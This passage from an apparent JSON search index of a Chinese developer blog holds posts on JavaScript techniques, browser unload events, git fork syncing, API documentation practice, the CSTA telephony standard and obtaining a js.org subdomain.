\u0026#39;wdd\u0026#39;}; undefined \u0026gt; Object.preventExtensions(person); Object {name: \u0026#34;wdd\u0026#34;} \u0026gt; person.age = 10 10 \u0026gt; person Object {name: \u0026#34;wdd\u0026#34;} \u0026gt; Object.isExtensible(person) false 2.2. 密封对象Object.seal 密封对象不可扩展,并且不能删除对象的属性或者方法。但是属性值可以修改。\n\u0026gt; var one = {name: \u0026#39;hihi\u0026#39;} undefined \u0026gt; Object.seal(one) Object {name: \u0026#34;hihi\u0026#34;} \u0026gt; one.age = 12 12 \u0026gt; one Object {name: \u0026#34;hihi\u0026#34;} \u0026gt; delete one.name false \u0026gt; one Object {name: \u0026#34;hihi\u0026#34;} 2.3. 冻结对象 Object.freeze 最严格的防篡改就是冻结对象。对象不可扩展,而且密封,不能修改。只能访问。\n3. 高级定时器 3.1. 函数节流 函数节流的思想是:某些代码不可以没有间断的连续重复执行\nvar processor = { timeoutId: null, // 实际进行处理的方法 performProcessing: function(){ ... }, // 初始化调用方法 process: function(){ clearTimeout(this.timeoutId); var that = this; this.timeoutId = setTimeout(function(){ that.performProcessing(); }, 100); } } // 尝试开始执行 processor.process(); 3.2. 中央定时器 页面如果有十个区域要动态显示当前时间,一般来说,可以用10个定时来实现。其实一个中央定时器就可以搞定。\n中央定时器动画 demo地址:http://wangduanduan.coding.me/my-all-demos/ninja/center-time-control.html\nvar timers = { timerId: 0, timers: [], add: function(fn){ this.timers.push(fn); }, start: function(){ if(this.timerId){ return; } (function runNext(){ if(timers.timers.length \u0026gt; 0){ for(var i=0; i \u0026lt; timers.timers.length ; i++){ if(timers.timers[i]() === false){ timers.timers.splice(i, 1); i--; } } timers.timerId = setTimeout(runNext, 16); } })(); }, stop: function(){ clearTimeout(timers.timerId); this.timerId = 0; } }; 参考书籍: 《javascript高级程序设计》 《javascript忍者秘籍》\n","permalink":"https://wdd.js.org/posts/2018/02/js-high-skills/","summary":"0.1. 安全类型检测 javascript内置类型检测并不可靠 safari某些版本(\u0026lt;4)typeof正则表达式返回为function 建议使用Object.prototype.toString.call()方法检测数据类型\nfunction isArray(value){ return Object.prototype.toString.call(value) === \u0026#34;[object Array]\u0026#34;; } function isFunction(value){ return Object.prototype.toString.call(value) === \u0026#34;[object Function]\u0026#34;; } function isRegExp(value){ return Object.prototype.toString.call(value) === \u0026#34;[object RegExp]\u0026#34;; } function isNativeJSON(){ return window.JSON \u0026amp;\u0026amp; Object.prototype.toString.call(JSON) === \u0026#34;[object JSON]\u0026#34;; } 对于ie中一COM对象形式实现的任何函数,isFunction都返回false,因为他们并非原生的javascript函数。\n在web开发中,能够区分原生与非原生的对象非常重要。只有这样才能确切知道某个对象是否有哪些功能\n以上所有的正确性的前提是:Object.prototype.toString没有被修改过\n0.2. 作用域安全的构造函数 function Person(name){ this.name = name; } //使用new来创建一个对象 var one = new Person(\u0026#39;wdd\u0026#39;); //直接调用构造函数 Person(); 由于this是运行时分配的,如果你使用new来操作,this指向的就是one。如果直接调用构造函数,那么this会指向全局对象window,然后你的代码就会覆盖window的原生name。如果有其他地方使用过window.name, 那么你的函数将会埋下一个深藏的bug。\n==那么,如何才能创建一个作用域安全的构造函数?== 方法1\nfunction Person(name){ if(this instanceof Person){ this.name = name; } else{ return new Person(name); } } 1.","title":"JavaScript 高级技巧"},{"content":"0.1. 先看题:mean的值是什么? var scores = [10,11,12]; var total = 0; for(var score in scores){ total += score; } var mean = total/scores.length; console.log(mean); 0.2. 是11? 恭喜你:答错了!\n0.3. 是1? 恭喜你:答错了!\n0.4. 正确答案: 4 解释: for in 循环循环的值永远是key, key是一个字符串。所以total的值是:\u0026lsquo;0012\u0026rsquo;。它是一个字符串,字符串'0012\u0026rsquo;/3,0012会被转换成12,然后除以3,结果是4。\n0.5. 后记 这个示例是来自《编写高质量JavaScript的68个方法》的第49条:数组迭代要优先使用for循环而不是for in循环。 既然已经发布,就可能有好事者拿出去当面试题。这个题目很有可能坑一堆人。其中包括我。\n这里涉及到许多js的基础知识.\nfor in 循环是循环对象的索引属性,key是一个字符串。 数值类型和字符串相加,会自动转换为字符串 字符串除以数值类型,会先把字符串转为数值,最终结果为数值 正确方法\nvar scores = [10,11,12]; var total = 0; for(var i=0, n=scores.length; i \u0026lt; n; i++){ total += scores[i]; } var mean = total/scores.length; console.log(mean); 这样写有几个好处。\n循环的终止条件简单且明确 即使在循环体内修改了数组,也能有效的终止循环。否则就可能变成死循环。 编译器很难保证重启计算scores.length是安全的。 提前确定了循环终止条件,避免多次计算数组长度。这个可能会被一些浏览器优化。 ","permalink":"https://wdd.js.org/posts/2018/02/i-realy-dont-know-js/","summary":"0.1. 先看题:mean的值是什么? var scores = [10,11,12]; var total = 0; for(var score in scores){ total += score; } var mean = total/scores.length; console.log(mean); 0.2. 是11? 恭喜你:答错了!\n0.3. 是1? 恭喜你:答错了!\n0.4. 正确答案: 4 解释: for in 循环循环的值永远是key, key是一个字符串。所以total的值是:\u0026lsquo;0012\u0026rsquo;。它是一个字符串,字符串'0012\u0026rsquo;/3,0012会被转换成12,然后除以3,结果是4。\n0.5. 后记 这个示例是来自《编写高质量JavaScript的68个方法》的第49条:数组迭代要优先使用for循环而不是for in循环。 既然已经发布,就可能有好事者拿出去当面试题。这个题目很有可能坑一堆人。其中包括我。\n这里涉及到许多js的基础知识.\nfor in 循环是循环对象的索引属性,key是一个字符串。 数值类型和字符串相加,会自动转换为字符串 字符串除以数值类型,会先把字符串转为数值,最终结果为数值 正确方法\nvar scores = [10,11,12]; var total = 0; for(var i=0, n=scores.length; i \u0026lt; n; i++){ total += scores[i]; } var mean = total/scores.","title":"突然觉得自己好像没学过JS"},{"content":"0.1. 同步Ajax 这种需求主要用于当浏览器关闭,或者刷新时,向后端发起Ajax请求。\nwindow.onunload = function(){ $.ajax({url:\u0026#34;http://localhost:8888/test.php?\u0026#34;, async:false}); }; 使用async:false参数使请求同步(默认是异步的)。\n同步请求锁定浏览器,直到完成。 如果请求是异步的,页面只是继续卸载。 它足够快,以至于该请求甚至没有时间触发。服务端很可能收不到请求。\n0.2. navigator.sendBeacon 优点:简洁、异步、非阻塞 缺点:这是实验性的技术,并非所有浏览器都支持。其中IE和safari不支持该技术。\n示例:\nwindow.addEventListener(\u0026#39;unload\u0026#39;, logData, false); function logData() { navigator.sendBeacon(\u0026#34;/log\u0026#34;, analyticsData); } 参考:http://stackoverflow.com/questions/1821625/ajax-request-with-jquery-on-page-unload 参考:https://developer.mozilla.org/en-US/docs/Web/API/Navigator/sendBeacon\n","permalink":"https://wdd.js.org/posts/2018/02/send-ajax-when-page-unload/","summary":"0.1. 同步Ajax 这种需求主要用于当浏览器关闭,或者刷新时,向后端发起Ajax请求。\nwindow.onunload = function(){ $.ajax({url:\u0026#34;http://localhost:8888/test.php?\u0026#34;, async:false}); }; 使用async:false参数使请求同步(默认是异步的)。\n同步请求锁定浏览器,直到完成。 如果请求是异步的,页面只是继续卸载。 它足够快,以至于该请求甚至没有时间触发。服务端很可能收不到请求。\n0.2. navigator.sendBeacon 优点:简洁、异步、非阻塞 缺点:这是实验性的技术,并非所有浏览器都支持。其中IE和safari不支持该技术。\n示例:\nwindow.addEventListener(\u0026#39;unload\u0026#39;, logData, false); function logData() { navigator.sendBeacon(\u0026#34;/log\u0026#34;, analyticsData); } 参考:http://stackoverflow.com/questions/1821625/ajax-request-with-jquery-on-page-unload 参考:https://developer.mozilla.org/en-US/docs/Web/API/Navigator/sendBeacon","title":"发起Ajax请求当页面onunload"},{"content":"1. 前提说明 仓库A: http://gitlab.tt.cc:30000/fe/omp.git 仓库B: 仓库Bfork自仓库A, 仓库A的地址是:http://gitlab.tt.cc:30000/wangdd/omp.git 某一时刻,仓库A更新了。仓库B需要同步上游分支的更新。\n2. 本地操作 // 1 查看远程分支 ➜ omp git:(master) git remote -v origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (fetch) origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (push) // 2 添加一个远程同步的上游仓库 ➜ omp git:(master) git remote add upstream http://gitlab.tt.cc:30000/fe/omp.git ➜ omp git:(master) git remote -v origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (fetch) origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (push) upstream\thttp://gitlab.tt.cc:30000/fe/omp.git (fetch) upstream\thttp://gitlab.tt.cc:30000/fe/omp.git (push) // 3 拉去上游分支到本地,并且会被存储在一个新分支upstream/master ➜ omp git:(master) git fetch upstream remote: Counting objects: 4, done. remote: Compressing objects: 100% (4/4), done. remote: Total 4 (delta 2), reused 0 (delta 0) Unpacking objects: 100% (4/4), done. From http://gitlab.tt.cc:30000/fe/omp * [new branch] master -\u0026gt; upstream/master // 4 将upstream/master分支合并到master分支,由于我已经在master分支,此处就不在切换到master分支 ➜ omp git:(master) git merge upstream/master Updating 29c098c..6413803 Fast-forward README.md | 1 + 1 file changed, 1 insertion(+) // 5 查看一下,此次合并,本地有哪些更新 ➜ omp git:(master) git log -p // 6 然后将更新推送到仓库B ➜ omp git:(master) git push 3. 总结 通过上述操作,仓库B就同步了仓库A的代码。整体的逻辑就是将上游分支拉去到本地,然后合并到本地分支上。就这么简单。\n","permalink":"https://wdd.js.org/posts/2018/01/fork-sync-learn/","summary":"1. 前提说明 仓库A: http://gitlab.tt.cc:30000/fe/omp.git 仓库B: 仓库Bfork自仓库A, 仓库A的地址是:http://gitlab.tt.cc:30000/wangdd/omp.git 某一时刻,仓库A更新了。仓库B需要同步上游分支的更新。\n2. 本地操作 // 1 查看远程分支 ➜ omp git:(master) git remote -v origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (fetch) origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (push) // 2 添加一个远程同步的上游仓库 ➜ omp git:(master) git remote add upstream http://gitlab.tt.cc:30000/fe/omp.git ➜ omp git:(master) git remote -v origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (fetch) origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (push) upstream\thttp://gitlab.tt.cc:30000/fe/omp.git (fetch) upstream\thttp://gitlab.tt.cc:30000/fe/omp.git (push) // 3 拉去上游分支到本地,并且会被存储在一个新分支upstream/master ➜ omp git:(master) git fetch upstream remote: Counting objects: 4, done. remote: Compressing objects: 100% (4/4), done.","title":"git合并上游仓库即同步fork后的仓库"},{"content":" 个人简介 我是Eddie Wang!\n精通JavaScript/Node.js,现在的兴趣是学习go语言 精通VOIP相关技术栈:SIP/opensips/Freeswitch等等 精通VIM email: 1779706607@qq.com Github: github.com/wangduanduan 语雀: yuque.com/wangdd, 将不会更新 个人博客: wdd.js.org, 最新内容将会发布在wdd.js.org 最喜欢的美剧《黄石》 博客说明 博客取名为洞香春,灵感来自孙皓晖所著《大秦帝国》。\n洞香春大致在战国时代中期所在地:魏国安邑。\n战国时期,社会制度发生着巨大变化,工商业日益兴旺,出现了以白圭为首的一批巨贾商人,而位于魏国安邑的洞香春酒肆就是白氏家族创办的产业中最为著名的一个。\n洞香春以名士荟萃、谈论国事、交流思想而著称于当时列国\n","permalink":"https://wdd.js.org/about/","summary":"个人简介 我是Eddie Wang!\n精通JavaScript/Node.js,现在的兴趣是学习go语言 精通VOIP相关技术栈:SIP/opensips/Freeswitch等等 精通VIM email: 1779706607@qq.com Github: github.com/wangduanduan 语雀: yuque.com/wangdd, 将不会更新 个人博客: wdd.js.org, 最新内容将会发布在wdd.js.org 最喜欢的美剧《黄石》 博客说明 博客取名为洞香春,灵感来自孙皓晖所著《大秦帝国》。\n洞香春大致在战国时代中期所在地:魏国安邑。\n战国时期,社会制度发生着巨大变化,工商业日益兴旺,出现了以白圭为首的一批巨贾商人,而位于魏国安邑的洞香春酒肆就是白氏家族创办的产业中最为著名的一个。\n洞香春以名士荟萃、谈论国事、交流思想而著称于当时列国","title":"关于我"},{"content":" 1. HTTP携带信息的方式 url headers body: 包括请求体,响应体 2. 分离通用信息 一般来说,headers里的信息都是通用的,可以提前说明,作为默认参数\n3. 路径中的参数表达式 URL中参数表达式使用{}的形式,参数包裹在大括号之中{paramName}\n例如:\n/api/user/{userId} /api/user/{userType}?age={age}\u0026amp;gender={gender} 4. 数据模型定义 数据模型定义包括:\n路径与查询字符串参数模型 请求体参数模型 响应体参数模型 数据模型的最小数据集:\n名称 是否必须 说明 “最小数据集”(MDS)是指通过收集最少的数据,较好地掌握一个研究对象所具有的特点或一件事情、一份工作所处的状态,其核心是针对被观察的对象建立起一套精简实用的数据指标。最小数据集的概念起源于美国的医疗领域。最小数据集的产生源于信息交换的需要,就好比上下级质量技术监督部门之间、企业与质量技术监督部门之间、质量技术监督部门与社会公众之间都存在着信息交换的需求。\n一些文档里可能会加入字段的类型,但是我认为这是没必要的。以为HTTP传输的数据往往都需要序列化,大部分数据类型都是字符串。一些特殊的类型,例如枚举类型的字符串,可以在说明里描述。\n另外:数据模型非常建议使用表格来表现。\n举个栗子🌰:\n名称 是否必须 说明 userType 是 用户类型。commom表示普通用户,vip表示vip用户 age 否 用户年龄 gender 否 用户性别。1表示男,0表示女 5. 请求示例 // general POST http://www.testapi.com/api/user // request payload { \u0026#34;name\u0026#34;: \u0026#34;qianxun\u0026#34;, \u0026#34;age\u0026#34;: 14, \u0026#34;like\u0026#34;: [\u0026#34;music\u0026#34;, \u0026#34;reading\u0026#34;], \u0026#34;userType\u0026#34;: \u0026#34;vip\u0026#34; } // response { \u0026#34;id\u0026#34;: \u0026#34;asdkfjalsdkf\u0026#34; } 6. 异常处理 异常处理最小数据集\n状态码 说明 解决方案 举个栗子🌰:\n状态码 说明 解决方案 401 用户名密码错误 检查用户名密码是否正确 424 超过最大在线数量 请在控制台修改最大在线数量 之前我一直不想把解决方案加入异常处理的最小数据集,但是对于很多开发者来说,即使它知道424代表超过最大在线数量。如果你不告诉如果解决这个问题,那么他们可能就会直接来问你。所以最好能够一步到位,直接告诉他应该如何解决,这样省时省力。\n7. 如何组织? 7.1. 一个创建用户的例子:创建用户 1 请求示例\n// general POST http://www.testapi.com/api/user/vip/?token=abcdefg // request payload { \u0026#34;name\u0026#34;: \u0026#34;qianxun\u0026#34;, \u0026#34;age\u0026#34;: 14, \u0026#34;like\u0026#34;: [\u0026#34;music\u0026#34;, \u0026#34;reading\u0026#34;] } // response { \u0026#34;id\u0026#34;: \u0026#34;asdkfjalsdkf\u0026#34; } 2 路径与查询字符串参数模型\nPOST http://www.testapi.com/api/user/{userType}/?token={token}\n名称 是否必须 说明 userType 是 用户类型。commom表示普通用户,vip表示vip用户 token 是 认证令牌 3 请求体参数模型\n名称 是否必须 说明 name 是 用户名。4-50个字符 age 否 年龄 like 否 爱好。最多20个 4 响应体参数模型\n名称 说明 id 用户id 5 异常处理\n状态码 说明 解决方案 401 token过期 请重新申请token 424 超过最大在创建人数 请在控制台修改最大创建人数 7.2. 这样组织的原因 请求示例: 请求示例放在第一位的原因是,要用最快的方式告诉开发者,这个接口应该如何请求 路径与查询字符串参数模型: 使用mustache包裹参数 请求体参数模型:如果没有请求体,可以不写 响应体参数模型: 异常处理 8. 文档提供的形式 文档建议由一下两种形式,在线文档,pdf文档。\n在线文档 更新方便 易于随时阅读 易于查找 pdf文档 内容表现始终如一,不依赖文档阅读器 文档只读,不会被轻易修改 其中由于是面对第三方开发者,公开的在线文档必须提供;由于某些特殊的原因,可能需要提供文件形式的文档,建议提供pdf文档。当然,以下的文档形式是非常不建议提供的:\nword文档 markdown文档 word文档和markdown文档有以下缺点:\n文档的表现形式非常依赖文档查看器:各个版本的word文档对word的表现形式差异很大,可能在你的电脑上内容表现很好的文档,到别人的电脑上就会一团乱麻;另外markdown文件也是如此。而且markdown中引入文件只能依靠图片链接,如果文档中含有图片,很可能会出现图片丢失的情况。 文档无法只读:文档无法只读,就有可能会被第三方开发者在不经意间修改,那么文档就无法保证其准确性了。 总结一下,文档形式的要点:\n只读性:保证文档不会被开发者轻易修改 一致性:保证文档在不同设备,不同文档查看器上内容表现始终如一 易于版本管理:文档即软件(DAAS: Document as a Software),一般意义上说软件 = 数据 + 算法, 但是我认为文档也是一种组成软件的重要形式。既然软件需要版本管理,文档的版本管理也是比不可少的。 ","permalink":"https://wdd.js.org/posts/2018/01/how-to-write-better-api-docs/","summary":"1. HTTP携带信息的方式 url headers body: 包括请求体,响应体 2. 分离通用信息 一般来说,headers里的信息都是通用的,可以提前说明,作为默认参数\n3. 路径中的参数表达式 URL中参数表达式使用{}的形式,参数包裹在大括号之中{paramName}\n例如:\n/api/user/{userId} /api/user/{userType}?age={age}\u0026amp;gender={gender} 4. 数据模型定义 数据模型定义包括:\n路径与查询字符串参数模型 请求体参数模型 响应体参数模型 数据模型的最小数据集:\n名称 是否必须 说明 “最小数据集”(MDS)是指通过收集最少的数据,较好地掌握一个研究对象所具有的特点或一件事情、一份工作所处的状态,其核心是针对被观察的对象建立起一套精简实用的数据指标。最小数据集的概念起源于美国的医疗领域。最小数据集的产生源于信息交换的需要,就好比上下级质量技术监督部门之间、企业与质量技术监督部门之间、质量技术监督部门与社会公众之间都存在着信息交换的需求。\n一些文档里可能会加入字段的类型,但是我认为这是没必要的。以为HTTP传输的数据往往都需要序列化,大部分数据类型都是字符串。一些特殊的类型,例如枚举类型的字符串,可以在说明里描述。\n另外:数据模型非常建议使用表格来表现。\n举个栗子🌰:\n名称 是否必须 说明 userType 是 用户类型。commom表示普通用户,vip表示vip用户 age 否 用户年龄 gender 否 用户性别。1表示男,0表示女 5. 请求示例 // general POST http://www.testapi.com/api/user // request payload { \u0026#34;name\u0026#34;: \u0026#34;qianxun\u0026#34;, \u0026#34;age\u0026#34;: 14, \u0026#34;like\u0026#34;: [\u0026#34;music\u0026#34;, \u0026#34;reading\u0026#34;], \u0026#34;userType\u0026#34;: \u0026#34;vip\u0026#34; } // response { \u0026#34;id\u0026#34;: \u0026#34;asdkfjalsdkf\u0026#34; } 6. 异常处理 异常处理最小数据集","title":"如何写好接口文档?"},{"content":"解决方法安装Windows7补丁:KB3008923; 下载地址: http://www.microsoft.com/en-us/download/details.aspx?id=45134 (32位) http://www.microsoft.com/zh-CN/download/details.aspx?id=45154 (64位)\n","permalink":"https://wdd.js.org/posts/2018/01/ie11-without-devtool/","summary":"解决方法安装Windows7补丁:KB3008923; 下载地址: http://www.microsoft.com/en-us/download/details.aspx?id=45134 (32位) http://www.microsoft.com/zh-CN/download/details.aspx?id=45154 (64位)","title":"win7 ie11 开发者工具打开后一片空白"},{"content":"1. 内容概要 CSTA协议与标准概述 CSTA OpenScape 语音架构概述 2. CSTA协议标准 2.1. 什么是CSTA ? CSTA:电脑支持通讯程序(Computer Supported TelecommunicationsApplications)\n基本的呼叫模型在1992建立,后来随着行业发展,呼叫模型也被加强和扩展,例如新的协议等等\nCSTA是一个应用层接口,用来监控呼叫,设备和网络\nCSTA创建了一个通讯程序的抽象层:\nCSTA并不依赖任何底层的信令协议 E.g.H.323,SIP,Analog,T1,ISDN,etc. CSTA并不要求用户必须使用某些设备 E.g.intelligentendpoints,low-function/stimulusdevices,SIPSignalingmodels-3PCC vs. Peer/Peer 适用不同的操作模式\n第三方呼叫控制 一方呼叫控制 CSTA的设计目标是为了提高各种CSTA实现之间的移植性\n规范化呼叫模型和行为 完成服务、事件定义 规范化标准 3. CSTA 标准的进化史 阶段1 (发布于 June ’92)\n40 特性, 66 页 (服务定义) 专注于呼叫控制 阶段2 (发布于 Dec. ’94)\n77 特性, 145 页 (服务定义) I/O \u0026amp; 语音单元服务, 更多呼叫控制服务 阶段3 - CSTA Phase II Features \u0026amp; versit CTI Technology\n发布于 Dec. ‘98 136 特性, 650 页 (服务定义) 作为ISO 标准发布于 July 2000 发布 CSTA XML (ECMA-323) June 2004 发布 “Using CSTA with Voice Browsers” (TR/85) Dec. 02 发布 CSTA WSDL (ECMA-348) June 2004 June 2004: 发布对象模型 TR/88\nJune 2004: 发布 “Using CSTA for SIP Phone User Agents (uaCSTA)” TR/87\nJune 2004: 发布 “Application Session Services” (ECMA-354)\nJune 2005: 发布 “WS-Session: WSDL for ECMA-354”(ECMA-366)\nDecember 2005 : 发布 “Management Notification and Computing Function Services”\nDecember 2005 : Session Management, Event Notification, Amendements for ECMA- 348” (TR/90)\nDecember 2006 : Published new editions of ECMA-269, ECMA-323, ECMA-348\n4. CSTA 标准文档 5. CSTA 标准扩展 新的特性可以被加入标准通过发布新版本的标准 新的参数,新的值可以被加入通过发布新版本的标准 未来的新版本必须下向后兼容 具体的实施可以增加属性通过CSTA自带的扩展机制(e.g. ONS – One Number Service) 6. CSTA 操作模型 CSTA操作模型由计算域和转换域组成,是CSTA定义在两个域之间的接口 CSTA标准规定了消息(服务以及事件上报),还有与之相关的行为 计算域是CSTA程序的宿主环境,用来与转换域交互与控制 转换域 - CSTA模型提供抽象层,程序可以观测并控制的。转换渔包括一些对象例如CSTA呼叫,设备,链接。 7. CSTA 操作模型:呼叫,设备,链接 相关说明是的的的的\n8. 参考 CSTAoverview CSTA_introduction_and_overview ","permalink":"https://wdd.js.org/posts/2018/01/csta-call-model-overview/","summary":"1. 内容概要 CSTA协议与标准概述 CSTA OpenScape 语音架构概述 2. CSTA协议标准 2.1. 什么是CSTA ? CSTA:电脑支持通讯程序(Computer Supported TelecommunicationsApplications)\n基本的呼叫模型在1992建立,后来随着行业发展,呼叫模型也被加强和扩展,例如新的协议等等\nCSTA是一个应用层接口,用来监控呼叫,设备和网络\nCSTA创建了一个通讯程序的抽象层:\nCSTA并不依赖任何底层的信令协议 E.g.H.323,SIP,Analog,T1,ISDN,etc. CSTA并不要求用户必须使用某些设备 E.g.intelligentendpoints,low-function/stimulusdevices,SIPSignalingmodels-3PCC vs. Peer/Peer 适用不同的操作模式\n第三方呼叫控制 一方呼叫控制 CSTA的设计目标是为了提高各种CSTA实现之间的移植性\n规范化呼叫模型和行为 完成服务、事件定义 规范化标准 3. CSTA 标准的进化史 阶段1 (发布于 June ’92)\n40 特性, 66 页 (服务定义) 专注于呼叫控制 阶段2 (发布于 Dec. ’94)\n77 特性, 145 页 (服务定义) I/O \u0026amp; 语音单元服务, 更多呼叫控制服务 阶段3 - CSTA Phase II Features \u0026amp; versit CTI Technology\n发布于 Dec. ‘98 136 特性, 650 页 (服务定义) 作为ISO 标准发布于 July 2000 发布 CSTA XML (ECMA-323) June 2004 发布 “Using CSTA with Voice Browsers” (TR/85) Dec.","title":"CSTA 呼叫模型简介"},{"content":" 之前我是使用wangduanduan.github.io作为我的博客地址,后来觉得麻烦,有把博客关了。最近有想去折腾折腾。 先看效果:wdd.js.org\n如果你不了解js.org可以看看我的这篇文章:一个值得所有前端开发者关注的网站js.org\n1. 前提 已经有了github pages的一个博客,并且博客中有内容,没有内容会审核不通过的。我第一次申请域名,就是因为内容太少而审核不通过。 2. 想好自己要什么域名? 比如你想要一个:wdd.js.org的域名,你先在浏览器里访问这个地址,看看有没有人用过,如果已经有人用过,那么你就只能想点其他的域名了。\n3. fork js.org的项目,添加自己的域名 1 fork https://github.com/js-org/dns.js.org 2 修改你fork后的仓库中的cnames_active.js文件,加上自己的一条域名,最好要按照字母顺序\n如下图所示,我在第1100行加入。注意,不要在该行后加任何注释。\n\u0026#34;wdd\u0026#34;: \u0026#34;wangduanduan.github.io\u0026#34;, 3 commit\n4. 加入CNAME文件 我是用hexo和next主题作为博客的模板。其中我在gh-pages分支写博客,然后部署到master分支。\n我在我的gh-pages分支的source目录下加入CNAME文件, 内容只有一行\nwdd.js.org 将博客再次部署好,如果CNAME生效的话,你已经无法从原来的地址访问:wangduanduan.github.io, 这个博客了。\n5. 向js.org项目发起pull-request 找到你fork后的项目,点击 new pull request, 向原来的项目发起请求。\n然后你可以在js-org/dns.js.org项目的pull requests看到你的请求,当这个请求被合并时,你就拥有了js.org的二级域名。\n","permalink":"https://wdd.js.org/posts/2018/01/how-to-get-jsorg-sub-domain/","summary":"之前我是使用wangduanduan.github.io作为我的博客地址,后来觉得麻烦,有把博客关了。最近有想去折腾折腾。 先看效果:wdd.js.org\n如果你不了解js.org可以看看我的这篇文章:一个值得所有前端开发者关注的网站js.org\n1. 前提 已经有了github pages的一个博客,并且博客中有内容,没有内容会审核不通过的。我第一次申请域名,就是因为内容太少而审核不通过。 2. 想好自己要什么域名? 比如你想要一个:wdd.js.org的域名,你先在浏览器里访问这个地址,看看有没有人用过,如果已经有人用过,那么你就只能想点其他的域名了。\n3. fork js.org的项目,添加自己的域名 1 fork https://github.com/js-org/dns.js.org 2 修改你fork后的仓库中的cnames_active.js文件,加上自己的一条域名,最好要按照字母顺序\n如下图所示,我在第1100行加入。注意,不要在该行后加任何注释。\n\u0026#34;wdd\u0026#34;: \u0026#34;wangduanduan.github.io\u0026#34;, 3 commit\n4. 加入CNAME文件 我是用hexo和next主题作为博客的模板。其中我在gh-pages分支写博客,然后部署到master分支。\n我在我的gh-pages分支的source目录下加入CNAME文件, 内容只有一行\nwdd.js.org 将博客再次部署好,如果CNAME生效的话,你已经无法从原来的地址访问:wangduanduan.github.io, 这个博客了。\n5. 向js.org项目发起pull-request 找到你fork后的项目,点击 new pull request, 向原来的项目发起请求。\n然后你可以在js-org/dns.js.org项目的pull requests看到你的请求,当这个请求被合并时,你就拥有了js.org的二级域名。","title":"组织在召唤:如何免费获取一个js.org的二级域名"},{"content":"1. visibilitychange事件 触发条件:浏览器标签页被隐藏或显示的时候会触发visibilitychange事件.\n使用场景:当标签页显示或者隐藏时,触发一些业务逻辑\ndocument.addEventListener(\u0026#34;visibilitychange\u0026#34;, function() { console.log( document.visibilityState ); }); 2. storage事件 触发条件:使用localStorage or sessionStorage存储或者修改某个本地存储时\n使用场景:标签页间通信\n// AB页面同源 // 在A 页面 window.addEventListener(\u0026#39;storage\u0026#39;, (e) =\u0026gt; {console.log(e)}) // 在B 页面,向120打个电话 localStorage.setItem(\u0026#39;makeCall\u0026#39;,\u0026#39;120\u0026#39;) // 然后可以在A页面间有输出, 可以看出A页面 收到了B页面的通知 ...key: \u0026#34;makeCall\u0026#34;, oldValue: \u0026#34;119\u0026#34;, newValue: \u0026#34;120\u0026#34;, ... 3. beforeunload事件 触发条件:当页面的资源将要卸载(及刷新或者关闭标签页前). 当页面依然可见,并且该事件可以被取消只时\n使用场景:关闭或者刷新页面时弹窗确认,关闭页面时向后端发送报告等\nwindow.addEventListener(\u0026#34;beforeunload\u0026#34;, function (e) { var confirmationMessage = \u0026#34;\\o/\u0026#34;; e.returnValue = confirmationMessage; // Gecko, Trident, Chrome 34+ return confirmationMessage; // Gecko, WebKit, Chrome \u0026lt;34 }); 4. navigator.sendBeacon 这个方法主要用于满足 统计和诊断代码 的需要,这些代码通常尝试在卸载(unload)文档之前向web服务器发送数据。过早的发送数据可能导致错过收集数据的机会。然而, 对于开发者来说保证在文档卸载期间发送数据一直是一个困难。因为用户代理通常会忽略在卸载事件处理器中产生的异步 XMLHttpRequest 。\n使用 sendBeacon() 方法,将会使用户代理在有机会时异步地向服务器发送数据,同时不会延迟页面的卸载或影响下一导航的载入性能。这就解决了提交分析数据时的所有的问题:使它可靠,异步并且不会影响下一页面的加载。此外,代码实际上还要比其他技术简单!\n注意:该方法在IE和safari没有实现\n使用场景:发送崩溃报告\nwindow.addEventListener(\u0026#39;unload\u0026#39;, logData, false); function logData() { navigator.sendBeacon(\u0026#34;/log\u0026#34;, analyticsData); } ","permalink":"https://wdd.js.org/posts/2018/01/browser-events/","summary":"1. visibilitychange事件 触发条件:浏览器标签页被隐藏或显示的时候会触发visibilitychange事件.\n使用场景:当标签页显示或者隐藏时,触发一些业务逻辑\ndocument.addEventListener(\u0026#34;visibilitychange\u0026#34;, function() { console.log( document.visibilityState ); }); 2. storage事件 触发条件:使用localStorage or sessionStorage存储或者修改某个本地存储时\n使用场景:标签页间通信\n// AB页面同源 // 在A 页面 window.addEventListener(\u0026#39;storage\u0026#39;, (e) =\u0026gt; {console.log(e)}) // 在B 页面,向120打个电话 localStorage.setItem(\u0026#39;makeCall\u0026#39;,\u0026#39;120\u0026#39;) // 然后可以在A页面间有输出, 可以看出A页面 收到了B页面的通知 ...key: \u0026#34;makeCall\u0026#34;, oldValue: \u0026#34;119\u0026#34;, newValue: \u0026#34;120\u0026#34;, ... 3. beforeunload事件 触发条件:当页面的资源将要卸载(及刷新或者关闭标签页前). 当页面依然可见,并且该事件可以被取消只时\n使用场景:关闭或者刷新页面时弹窗确认,关闭页面时向后端发送报告等\nwindow.addEventListener(\u0026#34;beforeunload\u0026#34;, function (e) { var confirmationMessage = \u0026#34;\\o/\u0026#34;; e.returnValue = confirmationMessage; // Gecko, Trident, Chrome 34+ return confirmationMessage; // Gecko, WebKit, Chrome \u0026lt;34 }); 4.","title":"不常用却很有妙用的事件及方法"},{"content":" 当你用浏览器访问某个网页时,你可曾想过,你看到的这个网页,实际上是属于你自己的。\n打个比喻:访问某个网站就好像是网购了一筐鸡蛋,鸡蛋虽然是养鸡场生产的,但是这个蛋我怎么吃,你养鸡场管不着。\n当然了,对于很多人来说,鸡蛋没有别的吃法,鸡蛋只能煮着吃。\n你可以看如下的页面:当你在某搜索引擎上搜索前端开发时\n大多数人看到的页面是这样的, 满屏的广告,满屏的推广,满屏的排名,满屏的中间地址跳转,满屏的流量劫持, 还有莆田系\n但是有些人的页面却是这样的:清晰,自然,链接直达,清水出芙蓉,天然去雕饰 这就是油猴子脚本干的事情, 当然,它能干的事情,远不止如此。它是齐天大圣孙悟空,有七十二变。\n1. 什么是油猴子脚本? 